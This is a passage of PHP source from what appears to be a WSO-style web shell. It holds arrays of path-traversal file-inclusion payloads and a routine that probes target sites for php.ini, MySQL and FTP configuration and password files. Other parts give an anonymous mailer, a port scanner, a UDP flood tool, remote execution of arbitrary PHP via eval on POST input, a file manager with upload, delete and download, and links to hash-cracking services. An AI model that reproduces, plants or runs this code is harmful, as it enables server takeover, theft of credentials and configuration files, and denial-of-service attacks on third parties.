59119 =>"../../../../../../../../../../../../../../../etc/php/apache/php.ini".$byte1."",
59220 =>"../../../../../../../../../../../../../../../etc/php/apache2/php.ini".$byte1."",
59321 =>"../../../../../../../../../../../../../../../web/conf/php.ini".$byte1."",
59422 =>"../../../../../../../../../../../../../../../usr/local/Zend/etc/php.ini".$byte1."",
59523 =>"../../../../../../../../../../../../../../../opt/xampp/etc/php.ini".$byte1."",
59624 =>"../../../../../../../../../../../../../../../var/local/www/conf/php.ini".$byte1."",
59725 =>"../../../../../../../../../../../../../../../etc/php/cgi/php.ini".$byte1."",
59826 =>"../../../../../../../../../../../../../../../etc/php4/cgi/php.ini".$byte1."",
59927 =>"../../../../../../../../../../../../../../../etc/php5/cgi/php.ini".$byte1."");
600$lfimysql = array(
6011 =>"../../../../../../../../../../../../../../../var/log/mysql/mysql-bin.log".$byte1."",
6022 =>"../../../../../../../../../../../../../../../var/log/mysql.log".$byte1."",
6033 =>"../../../../../../../../../../../../../../../var/log/mysqlderror.log".$byte1."",
6044 =>"../../../../../../../../../../../../../../../var/log/mysql/mysql.log".$byte1."",
6055 =>"../../../../../../../../../../../../../../../var/log/mysql/mysql-slow.log".$byte1."",
6066 =>"../../../../../../../../../../../../../../../var/mysql.log".$byte1."",
6077 =>"../../../../../../../../../../../../../../../var/lib/mysql/my.cnf".$byte1."",
6088 =>"../../../../../../../../../../../../../../../etc/mysql/my.cnf".$byte1."",
6099 =>"../../../../../../../../../../../../../../../var/log/mysqld.log".$byte1."",
61010 =>"../../../../../../../../../../../../../../../etc/my.cnf".$byte1."");
611$lfiftp = array(
6121 =>"../../../../../../../../../../../../../../../etc/logrotate.d/proftpd".$byte1."",
6132 =>"../../../../../../../../../../../../../../../www/logs/proftpd.system.log".$byte1."",
6143 =>"../../../../../../../../../../../../../../../var/log/proftpd".$byte1."",
6154 =>"../../../../../../../../../../../../../../../etc/proftp.conf".$byte1."",
6165 =>"../../../../../../../../../../../../../../../etc/protpd/proftpd.conf".$byte1."",
6176 =>"../../../../../../../../../../../../../../../etc/vhcs2/proftpd/proftpd.conf".$byte1."",
6187 =>"../../../../../../../../../../../../../../../etc/proftpd/modules.conf".$byte1."",
6198 =>"../../../../../../../../../../../../../../../var/log/vsftpd.log".$byte1."",
6209 =>"../../../../../../../../../../../../../../../etc/vsftpd.chroot_list".$byte1."",
62110 =>"../../../../../../../../../../../../../../../etc/logrotate.d/vsftpd.log".$byte1."",
62211 =>"../../../../../../../../../../../../../../../etc/vsftpd/vsftpd.conf".$byte1."",
62312 =>"../../../../../../../../../../../../../../../etc/vsftpd.conf".$byte1."",
62413 =>"../../../../../../../../../../../../../../../etc/chrootUsers".$byte1."",
62514 =>"../../../../../../../../../../../../../../../var/log/xferlog".$byte1."",
62615 =>"../../../../../../../../../../../../../../../var/adm/log/xferlog".$byte1."",
62716 =>"../../../../../../../../../../../../../../../etc/wu-ftpd/ftpaccess".$byte1."",
62817 =>"../../../../../../../../../../../../../../../etc/wu-ftpd/ftphosts".$byte1."",
62918 =>"../../../../../../../../../../../../../../../etc/wu-ftpd/ftpusers".$byte1."",
63019 =>"../../../../../../../../../../../../../../../usr/sbin/pure-config.pl".$byte1."",
63120 =>"../../../../../../../../../../../../../../../usr/etc/pure-ftpd.conf".$byte1."",
63221 =>"../../../../../../../../../../../../../../../etc/pure-ftpd/pure-ftpd.conf".$byte1."",
63322 =>"../../../../../../../../../../../../../../../usr/local/etc/pure-ftpd.conf".$byte1."",
63423 =>"../../../../../../../../../../../../../../../usr/local/etc/pureftpd.pdb".$byte1."",
63524 =>"../../../../../../../../../../../../../../../usr/local/pureftpd/etc/pureftpd.pdb".$byte1."",
63625 =>"../../../../../../../../../../../../../../../usr/local/pureftpd/sbin/pure-config.pl".$byte1."",
63726 =>"../../../../../../../../../../../../../../../usr/local/pureftpd/etc/pure-ftpd.conf".$byte1."",
63827 =>"../../../../../../../../../../../../../../../etc/pure-ftpd.conf".$byte1."",
63928 =>"../../../../../../../../../../../../../../../etc/pure-ftpd/pure-ftpd.pdb".$byte1."",
64029 =>"../../../../../../../../../../../../../../../etc/pureftpd.pdb".$byte1."",
64130 =>"../../../../../../../../../../../../../../../etc/pureftpd.passwd".$byte1."",
64231 =>"../../../../../../../../../../../../../../../etc/pure-ftpd/pureftpd.pdb".$byte1."",
64332 =>"../../../../../../../../../../../../../../../usr/ports/ftp/pure-ftpd/".$byte1."",
64433 =>"../../../../../../../../../../../../../../../usr/ports/net/pure-ftpd/".$byte1."",
64534 =>"../../../../../../../../../../../../../../../usr/pkgsrc/net/pureftpd/".$byte1."",
64635 =>"../../../../../../../../../../../../../../../usr/ports/contrib/pure-ftpd/".$byte1."",
64736 =>"../../../../../../../../../../../../../../../var/log/pure-ftpd/pure-ftpd.log".$byte1."",
64837 =>"../../../../../../../../../../../../../../../logs/pure-ftpd.log".$byte1."",
64938 =>"../../../../../../../../../../../../../../../var/log/pureftpd.log".$byte1."",
65039 =>"../../../../../../../../../../../../../../../var/log/ftp-proxy/ftp-proxy.log".$byte1."",
65140 =>"../../../../../../../../../../../../../../../var/log/ftp-proxy".$byte1."",
65241 =>"../../../../../../../../../../../../../../../var/log/ftplog".$byte1."",
65342 =>"../../../../../../../../../../../../../../../etc/logrotate.d/ftp".$byte1."",
65443 =>"../../../../../../../../../../../../../../../etc/ftpchroot".$byte1."",
65544 =>"../../../../../../../../../../../../../../../etc/ftphosts".$byte1."");
656$x = 1;
657if ( $type == 1 ) {
658$res1 = FetchURL($target.$lfitest);
659$res2 = FetchURL($target.$lfitest2);
660$rhash1 = md5($res1);
661$rhash2 = md5($res2);
662if ($rhash1 != $rhash2) {
663print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br />";
664while($lfiaccess[$x]) {
665$res3 = FetchURL($target.$lfiaccess[$x]);
666$rhash3 = md5($res3);
667if ($rhash3 != $rhash2) {
668print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lfiaccess[$x]."\">".$target."".$lfiaccess[$x]."</a><br />";
669}
670else {
671print "<font color='red'>[!] Failed!</font>".$target."".$lfiaccess[$x]."<br />";
672}
673$x++;
674}
675}
676}
677if ( $type == 2 ) {
678$res1 = FetchURL($target.$lfitest);
679$res2 = FetchURL($target.$lfitest2);
680$rhash1 = md5($res1);
681$rhash2 = md5($res2);
682if ($rhash1 != $rhash2) {
683print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br />";
684while($lficonfig[$x]) {
685$res3 = FetchURL($target.$lficonfig[$x]);
686$rhash3 = md5($res3);
687if ($rhash3 != $rhash2) {
688print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lficonfig[$x]."\">".$target."".$lficonfig[$x]."</a><br />";
689}
690else {
691print "<font color='red'>[!] Failed!</font>".$target."".$lficonfig[$x]."<br />";
692}
693$x++;
694}
695}
696}
697if ( $type == 3 ) {
698$res1 = FetchURL($target.$lfitest);
699$res2 = FetchURL($target.$lfitest2);
700$rhash1 = md5($res1);
701$rhash2 = md5($res2);
702if ($rhash1 != $rhash2) {
703print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br />";
704while($lfierror[$x]) {
705$res3 = FetchURL($target.$lfierror[$x]);
706$rhash3 = md5($res3);
707if ($rhash3 != $rhash2) {
708print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lfierror[$x]."\">".$target."".$lfierror[$x]."</a><br />";
709}
710else {
711print "<font color='red'>[!] Failed!</font>".$target."".$lfierror[$x]."<br />";
712}
713$x++;
714}
715}
716}
717if ( $type == 4 ) {
718$res1 = FetchURL($target.$lfitest);
719$res2 = FetchURL($target.$lfitest2);
720$rhash1 = md5($res1);
721$rhash2 = md5($res2);
722if ($rhash1 != $rhash2) {
723print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br />";
724while($lfiphpini[$x]) {
725$res3 = FetchURL($target.$lfiphpini[$x]);
726$rhash3 = md5($res3);
727if ($rhash3 != $rhash2) {
728print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lfiphpini[$x]."\">".$target."".$lfiphpini[$x]."</a><br />";
729}
730else {
731print "<font color='red'>[!] Failed!</font>".$target."".$lfiphpini[$x]."<br />";
732}
733$x++;
734}
735}
736}
737if ( $type == 5 ) {
738$res1 = FetchURL($target.$lfitest);
739$res2 = FetchURL($target.$lfitest2);
740$rhash1 = md5($res1);
741$rhash2 = md5($res2);
742if ($rhash1 != $rhash2) {
743print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br />";
744while($lfimysql[$x]) {
745$res3 = FetchURL($target.$lfimysql[$x]);
746$rhash3 = md5($res3);
747if ($rhash3 != $rhash2) {
748print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lfimysql[$x]."\">".$target."".$lfimysql[$x]."</a><br />";
749}
750else {
751print "<font color='red'>[!] Failed!</font>".$target."".$lfimysql[$x]."<br />";
752}
753$x++;
754}
755}
756}
757if ( $type == 6 ) {
758$res1 = FetchURL($target.$lfitest);
759$res2 = FetchURL($target.$lfitest2);
760$rhash1 = md5($res1);
761$rhash2 = md5($res2);
762if ($rhash1 != $rhash2) {
763print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br />";
764while($lfiftp[$x]) {
765$res3 = FetchURL($target.$lfiftp[$x]);
766$rhash3 = md5($res3);
767if ($rhash3 != $rhash2) {
768print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lfiftp[$x]."\">".$target."".$lfiftp[$x]."</a><br />";
769}
770else {
771print "<font color='red'>[!] Failed!</font>".$target."".$lfiftp[$x]."<br />";
772}
773$x++;
774}
775}
776}
777if ( $type == 7 ) {
778$res1 = FetchURL($target.$lfitest);
779$res2 = FetchURL($target.$lfitest2);
780$rhash1 = md5($res1);
781$rhash2 = md5($res2);
782if ($rhash1 != $rhash2) {
783print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br />";{
784$res3 = FetchURL($target.$lfiprocenv);
785$rhash3 = md5($res3);
786if ($rhash3 != $rhash2) {
787print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lfiprocenv."\">".$target."".$lfiprocenv."</a><br />";
788}
789else {
790print "<font color='red'>[!] Failed!</font>".$target."".$lfiprocenv."<br />";
791}
792}
793}
794}
795}
796wsoFooter();
797}
798function actionphptools() {
799wsoHeader();
800;echo '<center>';
801echo '<b>Mailer</b><br>
802<form action="'.$surl.'" method=POST>
803<input type="hidden" name="a" value="phptools">
804<input type=text name=to value=to><br>
805<input type=text name=from value=from><br>
806<input type=text name=subject value=subject><br>
807<input type=text name=body value=body><br>
808<input type=submit name=submit value=Submit></form>';
809if (isset($_POST['to']) &&isset($_POST['from']) &&isset($_POST['subject']) &&isset($_POST['body'])) {
810$headers = 'From: '.$_POST['from'];
811mail ($_POST['to'],$_POST['subject'],$_POST['body'],$headers);
812echo 'Email sent.';
813}
814echo '<br><b>Port Scanner</b><br>';
815$start = strip_tags($_POST['start']);
816$end = strip_tags($_POST['end']);
817$host = strip_tags($_POST['host']);
818if(isset($_POST['host']) &&is_numeric($_POST['end']) &&is_numeric($_POST['start'])){
819for($i = $start;$i<=$end;$i++){
820$fp = @fsockopen($host,$i,$errno,$errstr,3);
821if($fp){
822echo 'Port '.$i.' is <font color=green>open</font><br>';
823}
824flush();
825}
826}else{
827;echo '<form action="?" method="POST">
828<input type="hidden" name="a" value="phptools">
829Host:<br />
830<input type="text" name="host" value="localhost"/><br />
831Port start:<br />
832<input type="text" name="start" value="0"/><br />
833Port end:<br />
834<input type="text" name="end" value="5000"/><br />
835<input type="submit" value="Scan Ports" />
836</form>
837';
838}
839if(isset($_POST['host'])&&is_numeric($_POST['time'])){
840$pakits = 0;
841ignore_user_abort(TRUE);
842set_time_limit(0);
843$exec_time = $_POST['time'];
844$time = time();
845$max_time = $time+$exec_time;
846$host = $_POST['host'];
847for($i=0;$i<65000;$i++){
848$out .= 'X';
849}
850while(1){
851$pakits++;
852if(time() >$max_time){
853break;
854}
855$rand = rand(1,65000);
856$fp = fsockopen('udp://'.$host,$rand,$errno,$errstr,5);
857if($fp){
858fwrite($fp,$out);
859fclose($fp);
860}
861}
862echo "<br><b>UDP Flood</b><br>Completed with $pakits (".round(($pakits*65)/1024,2) ." MB) packets averaging ".round($pakits/$exec_time,2) ." packets per second \n";
863echo '<br><br>
864 <form action="'.$surl.'" method=POST>
865 <input type="hidden" name="a" value="phptools">
866 Host: <input type=text name=host value=localhost>
867 Length (seconds): <input type=text name=time value=9999>
868 <input type=submit value=Go></form>';
869}else{echo '<br><b>UDP Flood</b><br>
870 <form action=? method=POST>
871 <input type="hidden" name="a" value="phptools">
872 Host: <br><input type=text name=host value=localhost><br>
873 Length (seconds): <br><input type=text name=time value=9999><br>
874 <input type=submit value=Go></form>';
875}
876;echo '</center>';
877wsoFooter();}
878function actionPhp() {
879if(isset($_POST['ajax'])) {
880$_SESSION[md5($_SERVER['HTTP_HOST']) .'ajax'] = true;
881ob_start();
882eval($_POST['p1']);
883$temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0") ."';\n";
884echo strlen($temp),"\n",$temp;
885exit;
886}
887wsoHeader();
888if(isset($_POST['p2']) &&($_POST['p2'] == 'info')) {
889echo '<h1>PHP info</h1><div class=content><style>.p {color:#000;}</style>';
890ob_start();
891phpinfo();
892$tmp = ob_get_clean();
893$tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp);
894$tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
895echo str_replace('<h1','<h2',$tmp) .'</div><br>';
896}
897if(empty($_POST['ajax']) &&!empty($_POST['p1']))
898$_SESSION[md5($_SERVER['HTTP_HOST']) .'ajax'] = false;
899echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(\'Php\',null,this.code.value);}else{g(\'Php\',null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px">';
900echo ' <input type=checkbox name=ajax value=1 '.($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>';
901if(!empty($_POST['p1'])) {
902ob_start();
903eval($_POST['p1']);
904echo htmlspecialchars(ob_get_clean());
905}
906echo '</pre></div>';
907wsoFooter();
908}
909function actionFilesMan() {
910wsoHeader();
911echo '<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>';
912if(!empty($_POST['p1'])) {
913switch($_POST['p1']) {
914case 'uploadFile':
915if(!@move_uploaded_file($_FILES['f']['tmp_name'],$_FILES['f']['name']))
916echo "Can't upload file!";
917break;
918case 'mkdir':
919if(!@mkdir($_POST['p2']))
920echo "Can't create new dir";
921break;
922case 'delete':
923function deleteDir($path) {
924$path = (substr($path,-1)=='/') ?$path:$path.'/';
925$dh = opendir($path);
926while ( ($item = readdir($dh) ) !== false) {
927$item = $path.$item;
928if ( (basename($item) == "..") ||(basename($item) == ".") )
929continue;
930$type = filetype($item);
931if ($type == "dir")
932deleteDir($item);
933else
934@unlink($item);
935}
936closedir($dh);
937@rmdir($path);
938}
939if(is_array(@$_POST['f']))
940foreach($_POST['f'] as $f) {
941if($f == '..')
942continue;
943$f = urldecode($f);
944if(is_dir($f))
945deleteDir($f);
946else
947@unlink($f);
948}
949break;
950case 'paste':
951if($_SESSION['act'] == 'copy') {
952function copy_paste($c,$s,$d){
953if(is_dir($c.$s)){
954mkdir($d.$s);
955$h = @opendir($c.$s);
956while (($f = @readdir($h)) !== false)
957if (($f != ".") and ($f != ".."))
958copy_paste($c.$s.'/',$f,$d.$s.'/');
959}elseif(is_file($c.$s))
960@copy($c.$s,$d.$s);
961}
962foreach($_SESSION['f'] as $f)
963copy_paste($_SESSION['c'],$f,$GLOBALS['cwd']);
964}elseif($_SESSION['act'] == 'move') {
965function move_paste($c,$s,$d){
966if(is_dir($c.$s)){
967mkdir($d.$s);
968$h = @opendir($c.$s);
969while (($f = @readdir($h)) !== false)
970if (($f != ".") and ($f != ".."))
971copy_paste($c.$s.'/',$f,$d.$s.'/');
972}elseif(@is_file($c.$s))
973@copy($c.$s,$d.$s);
974}
975foreach($_SESSION['f'] as $f)
976@rename($_SESSION['c'].$f,$GLOBALS['cwd'].$f);
977}elseif($_SESSION['act'] == 'zip') {
978if(class_exists('ZipArchive')) {
979$zip = new ZipArchive();
980if ($zip->open($_POST['p2'],1)) {
981chdir($_SESSION['c']);
982foreach($_SESSION['f'] as $f) {
983if($f == '..')
984continue;
985if(@is_file($_SESSION['c'].$f))
986$zip->addFile($_SESSION['c'].$f,$f);
987elseif(@is_dir($_SESSION['c'].$f)) {
988$iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/'));
989foreach ($iterator as $key=>$value) {
990$zip->addFile(realpath($key),$key);
991}
992}
993}
994chdir($GLOBALS['cwd']);
995$zip->close();
996}
997}
998}elseif($_SESSION['act'] == 'unzip') {
999if(class_exists('ZipArchive')) {
1000$zip = new ZipArchive();
1001foreach($_SESSION['f'] as $f) {
1002if($zip->open($_SESSION['c'].$f)) {
1003$zip->extractTo($GLOBALS['cwd']);
1004$zip->close();
1005}
1006}
1007}
1008}elseif($_SESSION['act'] == 'tar') {
1009chdir($_SESSION['c']);
1010$_SESSION['f'] = array_map('escapeshellarg',$_SESSION['f']);
1011wsoEx('tar cfzv '.escapeshellarg($_POST['p2']) .' '.implode(' ',$_SESSION['f']));
1012chdir($GLOBALS['cwd']);
1013}
1014unset($_SESSION['f']);
1015break;
1016default:
1017if(!empty($_POST['p1'])) {
1018$_SESSION['act'] = @$_POST['p1'];
1019$_SESSION['f'] = @$_POST['f'];
1020foreach($_SESSION['f'] as $k =>$f)
1021$_SESSION['f'][$k] = urldecode($f);
1022$_SESSION['c'] = @$_POST['c'];
1023}
1024break;
1025}
1026}
1027$dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
1028if($dirContent === false) {echo 'Can\'t open this folder!';wsoFooter();return;}
1029global $sort;
1030$sort = array('name',1);
1031if(!empty($_POST['p1'])) {
1032if(preg_match('!s_([A-z]+)_(\d{1})!',$_POST['p1'],$match))
1033$sort = array($match[1],(int)$match[2]);
1034}
1035echo "<script>
1036 function sa() {
1037 for(i=0;i<d.files.elements.length;i++)
1038 if(d.files.elements[i].type == 'checkbox')
1039 d.files.elements[i].checked = d.files.elements[0].checked;
1040 }
1041
1042</script>
1043<table width='100%' class='main' cellspacing='0' cellpadding='2'>
1044<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>";
1045$dirs = $files = array();
1046$n = count($dirContent);
1047for($i=0;$i<$n;$i++) {
1048$ow = @posix_getpwuid(@fileowner($dirContent[$i]));
1049$gr = @posix_getgrgid(@filegroup($dirContent[$i]));
1050$tmp = array('name'=>$dirContent[$i],
1051'path'=>$GLOBALS['cwd'].$dirContent[$i],
1052'modify'=>date('Y-m-d H:i:s',@filemtime($GLOBALS['cwd'] .$dirContent[$i])),
1053'perms'=>wsoPermsColor($GLOBALS['cwd'] .$dirContent[$i]),
1054'size'=>@filesize($GLOBALS['cwd'].$dirContent[$i]),
1055'owner'=>$ow['name']?$ow['name']:@fileowner($dirContent[$i]),
1056'group'=>$gr['name']?$gr['name']:@filegroup($dirContent[$i])
1057);
1058if(@is_file($GLOBALS['cwd'] .$dirContent[$i]))
1059$files[] = array_merge($tmp,array('type'=>'file'));
1060elseif(@is_link($GLOBALS['cwd'] .$dirContent[$i]))
1061$dirs[] = array_merge($tmp,array('type'=>'link','link'=>readlink($tmp['path'])));
1062elseif(@is_dir($GLOBALS['cwd'] .$dirContent[$i])&&($dirContent[$i] != "."))
1063$dirs[] = array_merge($tmp,array('type'=>'dir'));
1064}
1065$GLOBALS['sort'] = $sort;
1066function wsoCmp($a,$b) {
1067if($GLOBALS['sort'][0] != 'size')
1068return strcmp(strtolower($a[$GLOBALS['sort'][0]]),strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1);
1069else
1070return (($a['size'] <$b['size']) ?-1 : 1)*($GLOBALS['sort'][1]?1:-1);
1071}
1072usort($files,"wsoCmp");
1073usort($dirs,"wsoCmp");
1074$files = array_merge($dirs,$files);
1075$l = 0;
1076foreach($files as $f) {
1077echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');" title='.$f['link'] .'><b>[ '.htmlspecialchars($f['name']) .' ]</b>').'</a></td><td>'.(($f['type']=='file')?wsoViewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms']
1078.'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>';
1079$l = $l?0:1;
1080}
1081echo "<tr><td colspan=7>
1082
1083 <input type=hidden name=a value='FilesMan'>
1084 <input type=hidden name=c value='".htmlspecialchars($GLOBALS['cwd']) ."'>
1085 <input type=hidden name=charset value='".(isset($_POST['charset'])?$_POST['charset']:'')."'>
1086 <select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>";
1087if(class_exists('ZipArchive'))
1088echo "<option value='zip'>Compress (zip)</option><option value='unzip'>Uncompress (zip)</option>";
1089echo "<option value='tar'>Compress (tar.gz)</option>";
1090if(!empty($_SESSION['act']) &&@count($_SESSION['f']))
1091echo "<option value='paste'>Paste / Compress</option>";
1092echo "</select> ";
1093if(!empty($_SESSION['act']) &&@count($_SESSION['f']) &&(($_SESSION['act'] == 'zip') ||($_SESSION['act'] == 'tar')))
1094echo "file name: <input type=text name=p2 value='wso_".date("Ymd_His") .".".($_SESSION['act'] == 'zip'?'zip':'tar.gz') ."'> ";
1095echo "<input type='submit' value='>>'></td></tr></form></table></div>";
1096wsoFooter();
1097}
1098function actionStringTools() {
1099if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
1100if(!function_exists('binhex')) {function binhex($p) {return dechex(bindec($p));}}
1101if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}}
1102if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= sprintf('%02X',ord($p[$i]));return strtoupper($r);}}
1103if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}
1104$stringTools = array(
1105'Base64 encode'=>'base64_encode',
1106'Base64 decode'=>'base64_decode',
1107'Url encode'=>'urlencode',
1108'Url decode'=>'urldecode',
1109'Full urlencode'=>'full_urlencode',
1110'md5 hash'=>'md5',
1111'sha1 hash'=>'sha1',
1112'crypt'=>'crypt',
1113'CRC32'=>'crc32',
1114'ASCII to HEX'=>'ascii2hex',
1115'HEX to ASCII'=>'hex2ascii',
1116'HEX to DEC'=>'hexdec',
1117'HEX to BIN'=>'hex2bin',
1118'DEC to HEX'=>'dechex',
1119'DEC to BIN'=>'decbin',
1120'BIN to HEX'=>'binhex',
1121'BIN to DEC'=>'bindec',
1122'String to lower case'=>'strtolower',
1123'String to upper case'=>'strtoupper',
1124'Htmlspecialchars'=>'htmlspecialchars',
1125'String length'=>'strlen',
1126);
1127if(isset($_POST['ajax'])) {
1128$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
1129ob_start();
1130if(in_array($_POST['p1'],$stringTools))
1131echo $_POST['p1']($_POST['p2']);
1132$temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
1133echo strlen($temp),"\n",$temp;
1134exit;
1135}
1136wsoHeader();
1137echo '<h1>String conversions</h1><div class=content>';
1138if(empty($_POST['ajax'])&&!empty($_POST['p1']))
1139$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
1140echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>";
1141foreach($stringTools as $k =>$v)
1142echo "<option value='".htmlspecialchars($v)."'>".$k."</option>";
1143echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 ".(@$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".(empty($_POST['p1'])?'':htmlspecialchars(@$_POST['p2']))."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>";
1144if(!empty($_POST['p1'])) {
1145if(in_array($_POST['p1'],$stringTools))echo htmlspecialchars($_POST['p1']($_POST['p2']));
1146}
1147echo"</pre></div><br><h1>Search text in files:</h1><div class=content>
1148
1149 <form onsubmit=\"g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;\"><table cellpadding='1' cellspacing='0' width='50%'>
1150 <tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr>
1151 <tr><td>Path:</td><td><input type='text' name='cwd' value='".htmlspecialchars($GLOBALS['cwd']) ."' style='width:100%'></td></tr>
1152 <tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr>
1153 <tr><td></td><td><input type='submit' value='>>'></td></tr>
1154 </table></form>";
1155function wsoRecursiveGlob($path) {
1156if(substr($path,-1) != '/')
1157$path.='/';
1158$paths = @array_unique(@array_merge(@glob($path.$_POST['p3']),@glob($path.'*',GLOB_ONLYDIR)));
1159if(is_array($paths)&&@count($paths)) {
1160foreach($paths as $item) {
1161if(@is_dir($item)){
1162if($path!=$item)
1163wsoRecursiveGlob($item);
1164}else {
1165if(@strpos(@file_get_contents($item),@$_POST['p2'])!==false)
1166echo "<a href='#' onclick='g(\"FilesTools\",null,\"".urlencode($item)."\", \"view\")'>".htmlspecialchars($item)."</a><br>";
1167}
1168}
1169}
1170}
1171if(@$_POST['p3'])
1172wsoRecursiveGlob($_POST['c']);
1173echo "</div><br><h1>Search for hash:</h1><div class=content>
1174
1175 <form method='post' target='_blank' name='hf'>
1176 <input type='text' name='hash' style='width:200px;'><br>
1177 <input type='button' value='hashcrack.com' onclick=\"document.hf.action='http://www.hashcrack.com/index.php';document.hf.submit()\"><br>
1178 <input type='button' value='milw0rm.com' onclick=\"document.hf.action='http://www.milw0rm.com/cracker/search.php';document.hf.submit()\"><br>
1179 <input type='button' value='hashcracking.info' onclick=\"document.hf.action='https://hashcracking.info/index.php';document.hf.submit()\"><br>
1180 <input type='button' value='md5.rednoize.com' onclick=\"document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()\"><br>
1181 <input type='button' value='md5decrypter.com' onclick=\"document.hf.action='http://www.md5decrypter.com/';document.hf.submit()\"><br>
1182 </form></div>";
1183wsoFooter();
1184}
1185function actionFilesTools() {
1186if( isset($_POST['p1']) )
1187$_POST['p1'] = urldecode($_POST['p1']);
1188if(@$_POST['p2']=='download') {
1189if(@is_file($_POST['p1']) &&@is_readable($_POST['p1'])) {
1190ob_start("ob_gzhandler",4096);
1191header("Content-Disposition: attachment; filename=".basename($_POST['p1']));
1192if (function_exists("mime_content_type")) {
1193$type = @mime_content_type($_POST['p1']);
1194header("Content-Type: ".$type);
1195}else
1196header("Content-Type: application/octet-stream");
1197$fp = @fopen($_POST['p1'],"r");
1198if($fp) {
1199while(!@feof($fp))
1200echo @fread($fp,1024);
1201fclose($fp);
1202}
1203}exit;
1204}
1205if( @$_POST['p2'] == 'mkfile') {
1206if(!file_exists($_POST['p1'])) {
1207$fp = @fopen($_POST['p1'],'w');
1208if($fp) {
1209$_POST['p2'] = "edit";
1210fclose($fp);
1211}
1212}
1213}
1214wsoHeader();
1215echo '<h1>File tools</h1><div class=content>';
